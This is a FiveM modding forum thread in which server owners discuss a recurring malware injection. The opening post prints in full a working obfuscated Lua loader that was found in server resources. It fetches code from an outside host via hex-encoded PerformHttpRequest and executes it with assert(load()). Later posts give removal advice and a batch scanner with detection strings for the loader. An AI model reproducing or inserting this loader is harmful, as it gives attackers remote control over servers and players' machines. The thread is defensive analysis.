A weird Line gets added to some resources

FiveM Resource Development & Modding Discussion
1

The line I find in many resources like mapmanager_server.lua

local MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[4][MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61\x72\x62\x61\x6e\x69\x75\x73\x2e\x63\x6f\x6d\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x43\x63\x6f\x4d\x4d", function (mlGYqdBLSGsGhUrkYhUAgFEmMbrEUDYofeHoDYJtUhBIpZmmRfkxKOljoTNFxmuTYiyGlo, bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm) if (bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm == MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[6] or bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm == MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[5]) then return end MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[4][MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[2]](MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[4][MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[3]](bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm))() end)

some of the effected resources

[cfx-default]\[managers]\mapmanager\mapmanager_server.lua
[cfx-default]\[system]\hardcap\server.lua
[standalone]\illenium-appearance\server\database\database.lua
[standalone]\illenium-appearance\server\database\playeroutfitcodes.lua
[standalone]\illenium-appearance\server\database\playerskins.lua
[standalone]\illenium-appearance\server\framework\esx\callbacks.lua

I tried to delete that line from all resources but it comes back
and i found that there is a exe file gets created in the rout of my server called subafivem.exe

EDIT

I found that it edits some server and client side files to add an obfuscated line that fetches data from a website
for the Solution i used so far check
anti-RAT/Malware - Pastebin.com
I’ll update this post when i get more infos

1 Like
2

That’s making me nervous…you’re teh second person to bring this up…

Possible malware attacks?
What resources are you running?

3

This is definitely malware, the x72 and so forth is hex:
Translating it, you get:

“PerformHttpRequest” “assertload”
and a website
[Edit, was gonna post it, but it’s not a good idea to post it - Run the translations yourself if you’re really curious but PLEASE PLEASE DO NOT VISIT IT!] - Take it to a professional reverser to get it looked at OR save your important resources and backup restore your box…

They’ve already likely gotten on your machine a few OTHER different ways and are using this to maintain a continuous connection. Take it offline and figure out what to do with it next…

4

These kinds of problems are usually caused by using malicious resources. Mostly these are obfuscated resources and can very often be found in leaked resources or even bought from shady sites (e.g. not Tebex).

In general terms:
Only download stuff you actually know is not malicious. E.g. the stuff in this forum should be free of such issues.

There are two ways to solve this:

  1. Delete recently added resources and remove the code in every single resources and hope that it doesn’t come back.
  2. Start the server from scratch and don’t use code from untrusted sources.
2 Likes
5

What i see atm, It’s a code line that download malware, a fivem cheat that permit to someone to control your server and your database… and more… Not completely sure for now but it’s the best info i have for now. It’s look like to be a RAT

6

If you use txadmin preset installation, some look to be infected by this weird code

7

I traced it with a vm and i found that it’s a cipher panel malware i blocked the ips and i’m willing to post the ips here to help anyone who has the same problem as mine i’m still investigating to find the exact resource

1 Like
8

Awesome work! Did you ever find out which resource was responsible?

9

Whats the ip adresses?

10

I changed the resources folder to read only because I had some trouble checking which resource is responsible and I wrote a NodeJS code that keeps watching the files and whenever a file get’s edited it logs it and so far so good no weird appends if you need the code I can share it and something weird that it adds a line to fxmanifest file server_scripts {'@mysql-async/lib/MySQL.lua'} i know it’s a normal dependency but it adds it to fxmanifest files even if it exists there idk what’s it’s purpose.

1 Like
11

check the pastbin file i provided it has all the extra infos

12

Was just wondering - Check this file:

I think it may help!

13

Can it do something on peoples PC or is that only a backdoor for VPS?

14

It absolutely can.
This malware makes file changes to the filesystem at the fiveM directory. It allows an attacker to have write privileges on your server.

The scary thing about this is the idea that fiveM client scripts DOWNLOAD from the server on server join.
This means, if the bad guy wanted to target a list of players, it’s no more easy than adding an additional resource that’s malicious…

It also has some command and control abilities. Think of it as ‘evil-ping’ the bad guys can use to make sure they can still ‘talk to’ your machine…at the drop of a hat, they can control it

More on C&C / C2 here:

15

But there should be a way to not let that happen?

16

I think this was due to a script which was gotten off of a website that wasn’t this one / tebex.

They tell us not to download scripts from 3rd parties and you’ll be ‘safe’ but I’d rather give this advice:

Understand your scripts. If you’re going to download it (even if it’s from fivem’s forums / tebex), make sure you 100% know what it’s doing. If you’re even 1% unsure, you run the risk of something like this happening. Be smart about the lua you download…

If you’re unsure about what it is, don’t run it…ask about it…ask around, ask as many times as it takes for you to be comfortable enough to explain it to someone else. And that’s every corner of the code you download.

Follow that rule and you’ll never have to worry about getting infected by a script you run…

17

I have deleted all lines that look like this 6f\x72\x6d\x48\x74\x74\x70\x52\x65\x7 and I have also deleted SubAFiveM.exe.

18

That’s not going to remove the malware.

Especially if it’s staged. If it’s staged, it uses multiple ‘checkpoints’ (if you will) to establish a lasting connection on your machine. This is just one of them. You’ll need to dig deeper to understand what it’s doing.

Maybe try checking out the github:

But remember, if they’re already on your machine, it’s unknown what they have access to.
The most certain thing you can do is a backup restore to an earlier point.

If you don’t take regular backups, you’ll need to try to figure out how to undo what was done which will require log-reading / reading teh gith

Otherwise…the last resort (the most certain, but also the most drastic) is a system wipe. Save the important files if you’re going this route, but make SURE they’re not malicious either…

19

I have scanned with windows defender and malwarebytes and no virus was found and I have also looked into many files for this github you sent for this piece of code and this code was not found on my pc in any file.

20

you can use this .bat file to check your resources (put it in /resources)
it’s a simple code that worked for me so it might help you

@echo off
set malwarefound=0
echo You must put this in your resoures directory!
echo [MalScanner] Welcome. Press enter to begin scanning.
pause
echo [MalScanner] Malware A checked
findstr /s /m "random_char" *.lua
if %errorlevel%==0 (
set malwarefound=1
)
echo ------------------------------------
echo [MalScanner] Malware B checked
findstr /s /m "Enchanced_Tabs" *.lua
if %errorlevel%==0 (
set malwarefound=1
)
echo ------------------------------------
echo [MalScanner] Malware C checked
findstr /s /m "helpCode" *.lua
if %errorlevel%==0 (
set malwarefound=1
)
echo ------------------------------------
echo [MalScanner] Malware D checked -- may be found in certain Cfx default resources, is a false positive
findstr /s /m "assert(load(" *.lua
if %errorlevel%==0 (
set malwarefound=1
)
echo ------------------------------------
echo [MalScanner] Malware E checked
findstr /s /m "\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74" *.lua
if %errorlevel%==0 (
set malwarefound=1
)
echo ------------------------------------
echo [MalScanner] Malware F checked
findstr /s /m "helperServer" *.lua
if %errorlevel%==0 (
set malwarefound=1
)
echo ------------------------------------
echo [MalScanner] Malware G checked
findstr /s /m "eGlAnDJByGaVAuyZDaXRzNwsCziWWqkhxierAdUuVyguVhqKsulbKUHiETOTsQTNuVsoCG" *.lua
if %errorlevel%==0 (
set malwarefound=1
)
echo ------------------------------------
if %malwarefound%==1 (
echo [MalScanner] Malware found! Check the above logged bad resource files. They contain malicious code. Use source comparison to remove it.
) else (
echo [MalScanner] No malware found.
)

pause
1 Like